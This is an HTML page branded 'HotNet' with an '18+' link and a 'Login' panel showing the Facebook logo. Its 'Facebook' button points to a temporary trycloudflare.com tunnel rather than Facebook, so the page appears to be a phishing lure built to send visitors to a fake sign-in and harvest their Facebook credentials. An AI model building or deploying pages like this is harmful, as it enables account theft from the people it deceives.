<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8"/>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
</head>
<style type="text/css">
body {
background-image: url('img1.jpeg');
background-size: 400px 700px;
transition: background-image 1s ease;
}

.header {
 padding: 10px;
 background-color: rgba(128,128,128, 0.4);
 justify-content: space-between;
 display: flex;
 border-radius: 10px;
 border: 1px solid red;
}

.logo {
 font-size: 24px;
 font-weight: bold;
 color: white;
 margin-left: 15px;
}
 
li {
  display: inline-block;
  margin-right: 10px;
  margin-top: 4px;
  font-weight: bold;
 }
a {
  text-decoration: none;
  transition: color 1s ease;
  color: white;
}

.meta {
  color: ;
  text-align: center;
}

.vert {
  border-left: 1px solid red;
  height: 30px;
  position: relative;
  margin-right: 90px;
}

.div1 {
  border: 0.7px solid gray;
  width: 300px;
  margin-left: 23px;
  display: none;
}

.div2 {
  border: 1px solid red;
  justify-content: center;
  align-items: center;
  position: relative;
  margin-top: 110px;
  padding: 20px;
  border-radius: 10px;
  background-color: rgba(128,128,128, 0.4);
}

.img1 {
   height: 90px;
   width: 90px;
   border-radius: 50px;
   margin-left: 105px;
   border: 1px solid red;
}

.a2 {
   margin-left:;
   font-weight: bold;
   color: white;
}

button {
   margin-left: 110px;
   margin-top: 10px;
   border-radius: 10px;
   background: blue;
   padding: 8px;
}

.footer {
  background-color: rgba(128,128,128, 0.4);
  padding: 10px;
  margin-top: 120px;
  border-radius: 10px;
  text-align: center;
  border: 1px solid red;
  display: ;
  color: white;
}
</style>
<body id="bodi">
<header class="header">
<h1 class="logo">HotNet</h1>
<p class="vert"></p>
<nav>
<ul>
<li><a href="login.html">18+</a></li>
</ul>
</nav>
</header>
<p class="meta">&copy created on feb 20, 2024</p>
<div class="div1">
</div>
<div class="div2">
<h3 style="text-align: center; color: white;">Login</h3>
<li><img class="img1" src="https://upload.wikimedia.org/wikipedia/commons/thumb/0/05/Facebook_Logo_%282019%29.png/1024px-Facebook_Logo_%282019%29.png"></li>
<button><a class="a2" href="https://despite-amongst-glass-district.trycloudflare.com">Facebook</a></button>
</div>
</body>
<footer class="footer">
<p>&copy enjoy.....</p>
</footer>
<script type="text/javascript">
 function dude() {
 var body = document.getElementById("bodi");
 var images = [
     "img1.jpeg",
     "img2.jpeg",
     "img3.jpeg",
     "img4.jpeg",
     "img5.jpeg"
 ];

var randomIndex = Math.floor(Math.random() * images.length);
body.style.backgroundImage = "url('" + images[randomIndex] + "')";
}
 setInterval(dude, 2000);
</script>
</html>
